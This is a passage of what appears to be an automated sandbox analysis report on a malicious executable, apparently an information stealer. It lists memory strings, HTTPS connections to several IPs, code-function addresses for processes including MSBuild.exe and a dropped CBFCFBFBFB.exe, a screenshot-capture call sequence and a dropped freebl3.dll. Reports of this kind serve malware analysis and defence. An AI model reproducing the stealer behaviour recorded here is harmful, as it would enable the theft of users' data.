                          Source: DBKKFC.4.drString found in binary or memory: https://www.mozilla.org
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: DBKKFC.4.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: DBKKFC.4.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                          Source: DBKKFC.4.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2195666046.000000001983B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                          Source: DBKKFC.4.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                          Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56251 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56249 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56255 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56239
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56237
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56238
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56242
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56242 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56265 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56244
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56245
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56239 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56240
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56241
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56258 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56250 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56254 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56247
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56249
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56253
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56254
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56255
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56256
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56250
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56251
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56252
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56257 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56253 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56247 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56257
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56258
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56265
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56240 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56266
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56244 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56262
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56237 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56263 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56263
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56256 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56241 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56266 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56245 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 56262 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,4_2_00411F55
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040145B GetCurrentProcess,NtQueryInformationProcess,4_2_0040145B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C8EB700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8EB8C0 rand_s,NtQueryVirtualMemory,4_2_6C8EB8C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,4_2_6C8EB910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,4_2_6C88F280
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006120AD0_2_006120AD
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066509B0_2_0066509B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006592510_2_00659251
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065434A0_2_0065434A
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006513E20_2_006513E2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006293D20_2_006293D2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006654390_2_00665439
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006535EA0_2_006535EA
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006266250_2_00626625
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066580B0_2_0066580B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00665BF30_2_00665BF3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00664C060_2_00664C06
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00611E050_2_00611E05
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041C4724_2_0041C472
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042D9334_2_0042D933
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042D1C34_2_0042D1C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042D5614_2_0042D561
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041950A4_2_0041950A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042DD1B4_2_0042DD1B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0042CD2E4_2_0042CD2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0041B7124_2_0041B712
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8835A04_2_6C8835A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C896C804_2_6C896C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E34A04_2_6C8E34A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8EC4A04_2_6C8EC4A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8964C04_2_6C8964C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8AD4D04_2_6C8AD4D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88D4E04_2_6C88D4E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C6CF04_2_6C8C6CF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8FAC004_2_6C8FAC00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C5C104_2_6C8C5C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8D2C104_2_6C8D2C10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F542B4_2_6C8F542B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8954404_2_6C895440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F545C4_2_6C8F545C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C0DD04_2_6C8C0DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E85F04_2_6C8E85F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C89FD004_2_6C89FD00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8B05124_2_6C8B0512
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8AED104_2_6C8AED10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8EE6804_2_6C8EE680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8A5E904_2_6C8A5E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E4EA04_2_6C8E4EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F76E34_2_6C8F76E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88BEF04_2_6C88BEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C89FEF04_2_6C89FEF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8D56004_2_6C8D5600
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C7E104_2_6C8C7E10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E9E304_2_6C8E9E30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8D2E4E4_2_6C8D2E4E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8A46404_2_6C8A4640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8A9E504_2_6C8A9E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C3E504_2_6C8C3E50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F6E634_2_6C8F6E63
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88C6704_2_6C88C670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8D77A04_2_6C8D77A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88DFE04_2_6C88DFE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8B6FF04_2_6C8B6FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C899F004_2_6C899F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C77104_2_6C8C7710
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8B60A04_2_6C8B60A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F50C74_2_6C8F50C7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8AC0E04_2_6C8AC0E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C58E04_2_6C8C58E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8978104_2_6C897810
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8CB8204_2_6C8CB820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8D48204_2_6C8D4820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8A88504_2_6C8A8850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8AD8504_2_6C8AD850
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8CF0704_2_6C8CF070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C51904_2_6C8C5190
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8E29904_2_6C8E2990
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88C9A04_2_6C88C9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8BD9B04_2_6C8BD9B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8AA9404_2_6C8AA940
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C89D9604_2_6C89D960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8DB9704_2_6C8DB970
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8FB1704_2_6C8FB170
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8FBA904_2_6C8FBA90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8822A04_2_6C8822A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8B4AA04_2_6C8B4AA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C89CAB04_2_6C89CAB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F2AB04_2_6C8F2AB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C8AC04_2_6C8C8AC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8A1AF04_2_6C8A1AF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8CE2F04_2_6C8CE2F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8C9A604_2_6C8C9A60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C88F3804_2_6C88F380
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8F53C84_2_6C8F53C8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8CD3204_2_6C8CD320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C8853404_2_6C885340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C89C3704_2_6C89C370
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C98ECD04_2_6C98ECD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C92ECC04_2_6C92ECC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA0AC304_2_6CA0AC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9F6C004_2_6C9F6C00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C93AC604_2_6C93AC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9C6D904_2_6C9C6D90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C934DB04_2_6C934DB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CABCDC04_2_6CABCDC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CAB8D204_2_6CAB8D20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9FED704_2_6C9FED70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA5AD504_2_6CA5AD50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9B6E904_2_6C9B6E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C93AEC04_2_6C93AEC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9D0EC04_2_6C9D0EC0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA10E204_2_6CA10E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9CEE704_2_6C9CEE70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA78FB04_2_6CA78FB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C93EFB04_2_6C93EFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA0EFF04_2_6CA0EFF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C930FE04_2_6C930FE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C936F104_2_6C936F10
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA70F204_2_6CA70F20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C99EF404_2_6C99EF40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9F2F704_2_6C9F2F70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA368E04_2_6CA368E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9808204_2_6C980820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9BA8204_2_6C9BA820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA048404_2_6CA04840
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9F09B04_2_6C9F09B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9C09A04_2_6C9C09A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9EA9A04_2_6C9EA9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA4C9E04_2_6CA4C9E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9649F04_2_6C9649F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9869004_2_6C986900
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9689604_2_6C968960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9AEA804_2_6C9AEA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9DEA004_2_6C9DEA00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C9E8A304_2_6C9E8A30
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF20AD13_2_00AF20AD
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B240E813_2_00B240E8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B500E813_2_00B500E8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B3A07813_2_00B3A078
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B5C11813_2_00B5C118
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B4E4B813_2_00B4E4B8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B4846813_2_00B48468
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B2255813_2_00B22558
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B4E6F813_2_00B4E6F8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B0662513_2_00B06625
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B2064813_2_00B20648
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B22AA813_2_00B22AA8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B56B3813_2_00B56B38
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B24DE813_2_00B24DE8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1EEF813_2_00B1EEF8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B5B1B813_2_00B5B1B8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B191CA13_2_00B191CA
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B2314813_2_00B23148
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1F2A813_2_00B1F2A8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1D2E213_2_00B1D2E2
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1926513_2_00B19265
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1925D13_2_00B1925D
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1D24813_2_00B1D248
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1939213_2_00B19392
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B093D213_2_00B093D2
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1946113_2_00B19461
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B235D813_2_00B235D8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1B65813_2_00B1B658
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B5FAB813_2_00B5FAB8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B45A2313_2_00B45A23
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B29A2813_2_00B29A28
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B1FCA813_2_00B1FCA8
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B35CD613_2_00B35CD6
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00AF1E0513_2_00AF1E05
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: 13_2_00B5FF7813_2_00B5FF78
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C8C94D0 appears 90 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6C8BCBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004104E7 appears 36 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAB09D0 appears 99 times
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00617A20 appears 51 times
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: String function: 00AF7A20 appears 51 times
                          Source: C:\ProgramData\CBFCFBFBFB.exeCode function: String function: 00B24BC8 appears 97 times
